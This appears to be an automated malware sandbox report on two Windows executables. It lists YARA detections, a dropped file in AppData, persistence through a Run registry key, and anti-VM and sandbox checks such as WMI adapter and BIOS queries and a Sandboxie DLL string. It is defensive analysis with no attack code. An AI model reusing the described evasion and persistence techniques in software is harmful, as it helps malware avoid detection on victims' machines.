                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.45de7d0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.4d1e7b0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.4dbe7d0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.453e7b0.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.44ee790.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.4ca6770.15.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.2c267d0.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.4cce790.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.3427aac.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.3427aac.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.2c267d0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.44c6770.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.5400000.16.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.44ee790.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.44c6770.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2235868873.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2114770908.00000000045DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2235868873.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2235868873.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2125383195.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2235868873.0000000004CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2114770908.0000000004391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Copy#51007602.exe PID: 6008, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: itdtn.exe PID: 2604, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_00F13651 push eax; retf 0_2_00F1365D
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 0_2_04EFFAC4 push es; iretd 0_2_04EFFAC7
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FD5150 push es; ret 2_2_06FD5160
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFBDD push es; iretd 2_2_06FDFBE0
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFBCD push es; iretd 2_2_06FDFBDC
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFBC9 push es; iretd 2_2_06FDFBCC
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB99 push es; iretd 2_2_06FDFBC8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB7D push es; iretd 2_2_06FDFB88
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB71 push es; iretd 2_2_06FDFB7C
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB6D push es; iretd 2_2_06FDFB70
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB55 push es; iretd 2_2_06FDFB5C
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB49 push es; iretd 2_2_06FDFB54
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB44 push es; iretd 2_2_06FDFB48
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB21 push es; iretd 2_2_06FDFB24
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB1D push es; iretd 2_2_06FDFB20
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FDFB10 push es; iretd 2_2_06FDFB1C
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F63651 push eax; retf 4_2_02F6365D
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B0FAC4 push es; iretd 4_2_05B0FAC7
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B28070 push es; ret 4_2_05B28076
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FE5150 push es; ret 5_2_06FE5160
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FEFBCD push es; iretd 5_2_06FEFBDC
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FEFB44 push es; iretd 5_2_06FEFB48
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FEFB10 push es; iretd 5_2_06FEFB1C
                        Source: C:\Users\user\Desktop\Copy#51007602.exeFile created: C:\Users\user\AppData\Roaming\itdtn.exeJump to dropped file
                        Source: C:\Users\user\Desktop\Copy#51007602.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run itdtnJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run itdtnJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: Copy#51007602.exe PID: 6008, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: itdtn.exe PID: 2604, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\Copy#51007602.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: 6290000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: 5560000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: 7290000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: 19290000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: 3290000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: 5290000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
